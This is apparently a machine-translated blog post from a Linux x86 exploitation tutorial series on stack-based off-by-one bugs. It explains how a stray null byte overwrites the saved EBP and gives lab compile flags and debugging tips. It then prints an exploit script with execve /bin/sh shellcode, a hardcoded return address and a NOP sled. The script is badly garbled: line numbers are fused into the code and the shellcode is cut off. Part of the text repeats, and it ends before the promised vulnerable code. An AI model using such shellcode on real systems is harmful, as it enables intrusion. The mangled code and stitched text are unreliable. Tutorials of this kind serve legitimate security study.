Three off-by-one vulnerabilities of Linux (x86) exploit series (stack based)

Off-by-one Vulnerability (stack based)

Original address: https://bbs.pediy.com/thread-216954.htm

What is off by one?

Copying a source string to a destination buffer may result in off by one

1, the source string length equals the target buffer length.

When the source string length equals the target buffer length, a single null byte is copied over the target buffer. Because the target buffer is located in the stack, a single null byte can overwrite the least significant bit (LSB) of the caller's EBP stored in the stack, which can lead to arbitrary code execution.

As always, full definition, let's take a look at the bug code off by one!

Too lazy to paste, or read the original bar, only to explain the part.

This full-text explanation is particularly clear, I only say the pit I encountered during the commissioning process.

The first is the core file debug, the Compile optiongcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c

Please note that the-G option is not used, then it is not debug mode, there is no debug mode, debugging when there is no way to break down the source, so can only use the core file.

Using the core file debugging method, the author also gave out, but I ran Python exp.py, but there is no core file. After querying the data, using the ulimit-c command query, found that the value is 0, originally the system default (?) Do not allow creation of core files, modify restrictions, modify with Ulimit-c 1000

After the modification, the core file is generated normally.

There is also a comparison pit point is, gdb debug buf address and really run release version of the BUF address is not the same, there are changes in the offset, need special attention.

Or the usual, share the exp.py file I've successfully debugged.

1 #exp.py2 #!/usr/bin/env python3 Importstruct4  fromSubprocessImportPager5 6 #Spawn a shell.7 #Execve (/bin/sh) Size-28 bytes.8SCODE ="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\$9 TenRET_ADDR = 0xbffff426 One  A #endianess Conversion - defConv (num): -  returnStruct.pack ("<i", num)#Turn Address + NOP ' s + Shellcode + j$ theBUF ="A"* 68 -BUF + =Conv (ret_addr) -BUF + ="\x90"* 30 -BUF + =SCODE +BUF + ="A"* 126 -  + Print "Calling vulnerable program" ACall (["./vuln", buf])

Off-by-one Vulnerability (stack based)

Virtual machine Installation: Ubuntu 12.04 (x86)

What is off by one?

Copying a source string to a destination buffer may result in off by one

1, the source string length equals the target buffer length.

When the source string length equals the target buffer length, a single null byte is copied over the target buffer. Because the target buffer is located in the stack, a single null byte can overwrite the least significant bit (LSB) of the caller's EBP stored in the stack, which can lead to arbitrary code execution.

As always, full definition, let's take a look at the bug code off by one!

Vulnerability Code:

Three off-by-one vulnerabilities of Linux (x86) exploit series (stack based)